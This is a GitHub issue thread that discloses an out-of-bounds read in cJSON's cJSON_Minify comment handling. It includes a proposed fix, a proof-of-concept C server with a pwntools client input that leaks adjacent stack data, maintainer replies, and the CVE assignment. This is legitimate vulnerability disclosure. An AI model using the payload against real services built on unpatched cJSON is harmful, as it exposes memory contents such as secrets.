Closed
Description
https://github.com/DaveGamble/cJSON/blob/master/cJSON.c : 2669
this bug can delete \x00, cross-border read&write, and if use str* API result will fault, cause some logical problem, such as stack&heapoverflow, leak info etc..
else if ((*json == '/') && (json[1] == '*'))
{
/* multiline comments. */
while (*json && !((*json == '*') && (json[1] == '/')))
{
json++;
}
json += 2;
}this should be code as below:
else if ((*json == '/') && (json[1] == '*'))
{
/* multiline comments. */
while (*json && !((*json == '*') && (json[1] == '/')))
{
json++;
}
if(!(*json))
{
/* break or return */
}
json += 2;
}just leak stack data for test
server.c
int main(int argc, const char* argv[]) {
int lfd = socket(AF_INET, SOCK_STREAM, 0);
struct sockaddr_in serv_addr;
memset(&serv_addr, 0, sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
serv_addr.sin_port = htons(880);
serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
bind(lfd, (struct sockaddr*)&serv_addr, sizeof(serv_addr));
listen(lfd, 64);
struct sockaddr_in clien_addr;
socklen_t clien_len = sizeof(clien_addr);
int cfd = accept(lfd, (struct sockaddr*)&clien_addr, &clien_len);
char ipbuf[128];
printf("client iP: %s, port: %d\n", inet_ntop(AF_INET, &clien_addr.sin_addr.s_addr, ipbuf, sizeof(ipbuf)),
ntohs(clien_addr.sin_port));
char leakdata1[16] = "passwordpassword";
char buf[16] = {0};
char leakdata1[16] = "passwordpassword";
memset(buf, 0, 16);
while(1) {
int len = read(cfd, buf, sizeof(buf));
printf("recv bufdata = %s\n", buf);
cJSON_Minify(buf);
printf("After cJSON_Minify, bufdata:\n%s\n", buf);
}
close(cfd);
close(lfd);
return 0;
}client just send data(15bytes, not buf overflow) as below,
from pwn import *
p = remote('127.0.0.1', 880)
p.send('/*abcdefghjklmn')
raw_input('waiting...')
output:
client iP: 127.0.0.1, prot: 39284
recv bufdata = /*abcdefghjklmn
After cJSON_Minify, bufdata:
asswordpassword127.0.0.1
Activity
bigric3 commentedon Feb 23, 2019
@kbranigan @DaveGamble @ecksun @jwilk
ecksun commentedon Feb 23, 2019
I'm confused, why did you highlight me? What can I help you with?
bigric3 commentedon Feb 25, 2019
sorry, when i type '@', your name auto appear, I thought you are admin of cJSON
ecksun commentedon Mar 3, 2019
Ah, I see, no, I'm not, sorry for that.
FSMaxB commentedon Apr 12, 2019
Sorry for taking so long to respond. It has been hard to find any free time to work on this lately.
FSMaxB commentedon Apr 12, 2019
There is indeed a problem here and looking at cJSON_Minify a bit more I think there is at least one more.
cJSON_Minifyis probably the one function that I looked at the least in cJSON ... I'll take a closer look at the entire function and adress all upcoming Issues.Rewrite cJSON_Minify, fixing buffer overflows, fixes #338
package/cjson: security bump to version 1.7.11
package/cjson: security bump to version 1.7.11
ddillard commentedon May 1, 2019
Has anyone requested a CVE for this yet? Just saw CVE-2016-10749 finally get published for a different issue?
carnil commentedon May 9, 2019
CVE-2019-11835 was assigned for this issue.